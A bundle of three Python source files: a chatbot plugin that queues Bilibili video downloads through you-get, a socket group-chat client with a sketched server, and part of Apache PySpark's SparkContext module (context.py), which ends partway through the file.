youget.py
|
from core.bots._base import Bot
from core.state import State
from _global import regex
from _global.const import _Score
from _global.mission import Mission
import os
import time
import subprocess
class YouGetBiliBili(Bot):
def __init__(self, pool):
super(YouGetBiliBili, self).__init__()
self.pool = pool
self.download_dict = {}  # maps download id to its subprocess; ids use the form "#dd" (two digits)
self.download_name_dict = {}  # maps download id to the video title; same "#dd" format
self.url = None
self.act = False
self.act_message = ""
def match(self, query, st):
self.url = regex.url2.search(query)
# for now only BiliBili links are handled
return any([self.url is not None and "bilibili" in self.url[0],
"youget" in query,
"you_get" in query,
"you-get" in query,
"YOUGET" in query]), _Score.LevelNormal
def helper(self):
return ["给我一个B站视频的链接我能直接下载噢"]
def activate_match(self, query, st: State):
return self.act
def activate_say(self, query, st):
self.act = False
return self.act_message
def get_response(self, query, st: State):
user_id = st.user_id
self.url = regex.url2.search(query)
if "取消" in query or "#" in query:
if query.startswith("#"):
# the reply itself is the id
id = query
else:
id = regex.youget_number.search(query)  # download/process identifier
if id is not None:
id = id[0]
if id is None or id not in self.download_dict:
ans = "没有找到合适的id。\n" if id is None else "没有找到{}。\n".format(id)
ans += "你需要取消下载哪一个?\n\n"
for id, title in self.download_name_dict.items():
ans += "- [{id}]:{title}\n".format(id=id, title=title)
else:
pro = self.download_dict[id]
pro.terminate()
del self.download_dict[id]
del self.download_name_dict[id]
ans = "已经取消啦"
return ans
elif self.url is not None:
# strip Chinese characters and other noise from the matched URL first
url = regex.alpah_number_sym.sub("", self.url[0])
# extract the title first
# cmd = "you-get {url} --json".format(url=url)
# p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = p.stdout.read()
#
# parsed_json = json.loads(out.decode())
title = url # parsed_json["title"]
def func():
try:
out_stream = open("./UserData/tmp/youget_output.txt", "w")
dir_ = os.path.join("./UserData/{}".format(user_id), "video")
if not os.path.exists(dir_):
os.makedirs(dir_)
output_dir = os.path.join(dir_, str(int(time.time())))
cmd = "you-get {url} --output-dir {output} -a -l".format(url=url,
output=output_dir)
id = "#{}".format(len(self.download_dict))
self.download_name_dict[id] = title
self.download_dict[id] = subprocess.Popen(cmd.split(" "),
shell=False, stdout=out_stream,
stderr=subprocess.PIPE)
self.download_dict[id].wait()
out_stream.close()
# wait() returns on completion, error, or manual cancellation; check whether to push a notification
if id in self.download_dict:
# if the download was cancelled manually, the id has already been removed from the dict
error_info = self.download_dict[id].stderr.read().decode("utf-8", errors="replace")
if len(error_info) == 0:
self.act = True
self.act_message = "{}下载完成咯。保存在{}".format(title, output_dir)
else:
self.act = True
self.act_message = "下载出问题了。\n问题报告:{}".format(error_info)
del self.download_dict[id]
del self.download_name_dict[id]
except Exception as e:
raise e
# t = Thread(target=func)
# t.setDaemon(True)
# t.start()
mission = Mission(name="you-get: {}".format(url), func=func)
self.pool.add_mission(mission)
ans = "我在用you-get下载{}了哦。\n视频名字叫:{}".format(url, title)
self.url = None
return ans
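# A minimal usage sketch (illustrative only; assumes a `pool` exposing an
# `add_mission(Mission)` method and an `st` State object carrying `user_id`, as used
# above; the URL below is a placeholder):
#
#   bot = YouGetBiliBili(pool)
#   matched, score = bot.match("https://www.bilibili.com/video/xxxx", st)
#   if matched:
#       print(bot.get_response("https://www.bilibili.com/video/xxxx", st))
#   # Each queued download gets an id of the form "#0", "#1", ...; a later message
#   # containing that id (or the word "取消") terminates the subprocess and drops it
#   # from download_dict / download_name_dict.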
|
socket-client.py
|
import socket as Socket
from socket import AF_INET, SOCK_STREAM, socket
from threading import Thread
import time
class Client:
def __init__(self):
self.client_socket = socket(AF_INET, SOCK_STREAM)
self.name = str(Socket.gethostbyname(Socket.gethostname()))
self.receive_thread = None
self.server_port = 9876
self.server_host = ''
self.groupchat_port = 0
self.main()
def main(self):
self.server_host = input('Enter ip: ').strip()
while True:
self.client_socket = socket(AF_INET, SOCK_STREAM)
self.client_socket.connect((self.server_host, self.server_port))
while True:
msg = input().strip()
if msg == '/setname':
self.name = input().strip()
elif msg == '/newgroup':
valid = False
while not valid:
self.client_socket.send(bytes('/newgroup', 'utf8'))
self.client_socket.send(bytes(input('Group name: '), 'utf8'))
self.client_socket.send(bytes(input('Password: '), 'utf8'))
valid = self.client_socket.recv(1024).decode('utf8') != '0'  # '0' signals failure, matching the password check below
elif msg == '/connect':
self.client_socket.send(bytes('/getgroup', 'utf8'))
self.client_socket.send(bytes(input('Group name: '), 'utf8'))
self.groupchat_port = int(self.client_socket.recv(1024).decode('utf8'))
self.client_socket.close()
break
elif msg == '/delete':
self.client_socket.send(bytes('/delete', 'utf8'))
self.client_socket.send(bytes(input('Group name: '), 'utf8'))
self.client_socket.send(bytes(input('Password: '), 'utf8'))
else:
print('Unknown command!')
if self.groupchat_port == -1:
print('Group not found!')
continue
self.client_socket = socket(AF_INET, SOCK_STREAM)
self.client_socket.connect((self.server_host, self.groupchat_port))
self.client_socket.send(bytes(input('Password: '), 'utf8'))
if self.client_socket.recv(1024).decode('utf8') == '0':
print('Wrong password!')
self.client_socket.close()
continue
self.receive_thread = Thread(target=self.receive)
self.receive_thread.start()
while True:
msg = input().strip()
if msg == '/setname':
self.name = input().strip()
elif msg == '/quit':
self.client_socket.close()
print('Disconnected')
break
elif msg == '/data':
file = open('Test.txt', 'r')
fileData = file.read(1024)
file.close()
self.client_socket.send(bytes(fileData, 'utf8'))  # send() needs bytes, not a str plus an encoding
else:
self.client_socket.send(bytes(f'{self.name}: {msg}', 'utf8'))
def send(self, msg):
self.client_socket.send(bytes(msg, 'utf8'))
def receive(self):
while True:
try:
msg = self.client_socket.recv(1024).decode('utf8')
print(msg)
except OSError:
break
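# The matching server is not included in this file. Below is a minimal, illustrative
# sketch of the group-chat phase only (password check, then broadcast). The lobby
# commands (/newgroup, /getgroup, /delete) are not handled here, and the default
# host/port/password values are placeholders; the only protocol detail taken from the
# client above is that '0' means "wrong password".
def run_groupchat_server(host='0.0.0.0', port=10000, password='secret'):
    from socket import socket, AF_INET, SOCK_STREAM
    from threading import Thread
    clients = []
    server = socket(AF_INET, SOCK_STREAM)
    server.bind((host, port))
    server.listen(5)
    def handle(conn):
        # first message from a client is the password; reply '0' on mismatch
        if conn.recv(1024).decode('utf8') != password:
            conn.send(bytes('0', 'utf8'))
            conn.close()
            return
        conn.send(bytes('1', 'utf8'))
        clients.append(conn)
        while True:
            try:
                msg = conn.recv(1024)
            except OSError:
                break
            if not msg:
                break
            # relay the message to every other connected client
            for other in list(clients):
                if other is not conn:
                    other.send(msg)
        clients.remove(conn)
        conn.close()
    while True:
        conn, _ = server.accept()
        Thread(target=handle, args=(conn,), daemon=True).start()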
if __name__ == '__main__':
client = Client()
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import signal
import sys
import threading
import warnings
import importlib
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from py4j.java_gateway import is_instance_of
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway, local_connect_and_auth
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer, ChunkedStream
from pyspark.storagelevel import StorageLevel
from pyspark.resource.information import ResourceInformation
from pyspark.rdd import RDD, _load_from_socket
from pyspark.taskcontext import TaskContext
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
__all__ = ['SparkContext']
# These are special default configs for PySpark; they will overwrite
# the default ones for Spark if they are not configured by the user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create :class:`RDD` and
broadcast variables on that cluster.
.. note:: Only one :class:`SparkContext` should be active per JVM. You must `stop()`
the active :class:`SparkContext` before creating a new one.
.. note:: :class:`SparkContext` instance is not supported to share across multiple
processes out of the box, and PySpark does not guarantee multi-processing execution.
Use threads instead for concurrent processing purpose.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through `conf`.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A :class:`SparkConf` object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
if (conf is None or
conf.get("spark.executor.allowSparkContext", "false").lower() != "true"):
# In order to prevent SparkContext from being created in executors.
SparkContext._assert_on_driver()
self._callsite = first_spark_call() or CallSite(None, None, None)
if gateway is not None and gateway.gateway_parameters.auth_token is None:
raise ValueError(
"You are trying to pass an insecure Py4j gateway to Spark. This"
" is not allowed as it is a security risk.")
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represents the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
# If encryption is enabled, we need to setup a server in the jvm to read broadcast
# data via a socket.
# scala's mangled names w/ $ in them require special treatment.
self._encryption_enabled = self._jvm.PythonUtils.isEncryptionEnabled(self._jsc)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] speficied in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
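# Illustrative usage (a minimal sketch, not part of the original source): getOrCreate
# returns the currently active context if there is one, otherwise it builds a new
# SparkContext from the given (or a default) SparkConf and registers it as the singleton.
#
#   >>> sc = SparkContext.getOrCreate(SparkConf().setMaster("local").setAppName("demo"))
#   >>> SparkContext.getOrCreate() is sc
#   True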
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
Set a Java system property, such as spark.executor.memory. This must
be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(range(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using range
is recommended for performance if the input represents a range.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(range(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, range):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
# it's an empty iterator here but we need this line for triggering the
# logic of signal handling in FramedSerializer.load_stream, for instance,
# SpecialLengths.END_OF_DATA_SECTION in _read_with_length. Since
# FramedSerializer.load_stream produces a generator, the control should
# at least be in that function once. Here we do it by explicitly converting
# the empty iterator to a list, thus make sure worker reuse takes effect.
# See more details in SPARK-26549.
assert len(list(iterator)) == 0
return range(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
def reader_func(temp_filename):
return self._jvm.PythonRDD.readRDDFromFile(self._jsc, temp_filename, numSlices)
def createRDDServer():
return self._jvm.PythonParallelizeServer(self._jsc.sc(), numSlices)
jrdd = self._serialize_to_jvm(c, serializer, reader_func, createRDDServer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, serializer, reader_func, createRDDServer):
"""
Using py4j to send a large dataset to the jvm is really slow, so we use either a file
or a socket if we have encryption enabled.
:param data:
:param serializer:
:param reader_func: A function which takes a filename and reads in the data in the jvm and
returns a JavaRDD. Only used when encryption is disabled.
:param createRDDServer: A function which creates a PythonRDDServer in the jvm to
accept the serialized data, for use when encryption is enabled.
:return:
"""
if self._encryption_enabled:
# with encryption, we open a server in java and send the data directly
server = createRDDServer()
(sock_file, _) = local_connect_and_auth(server.port(), server.secret())
chunked_out = ChunkedStream(sock_file, 8192)
serializer.dump_stream(data, chunked_out)
chunked_out.close()
# this call will block until the server has read all the data and processed it (or
# throws an exception)
r = server.getResult()
return r
else:
# without encryption, we serialize to a file, and we read the file in java and
# parallelize from there.
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
try:
serializer.dump_stream(data, tempFile)
finally:
tempFile.close()
return reader_func(tempFile.name)
finally:
# we eagerly read the file so we can delete it right afterwards.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using :meth:`RDD.saveAsPickleFile` method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
The text files must be encoded as UTF-8.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
['Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
The text files must be encoded as UTF-8.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files:
.. code-block:: text
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do ``rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")``,
then ``rdd`` contains:
.. code-block:: text
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[('.../1.txt', '1'), ('.../2.txt', '2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
.. note:: Small files are preferred; large files are also allowed, but
may cause poor performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. :class:`PickleSerializer` is used to deserialize pickled objects on the Python side
:param path: path to sequencefile
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter:
:param valueConverter:
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
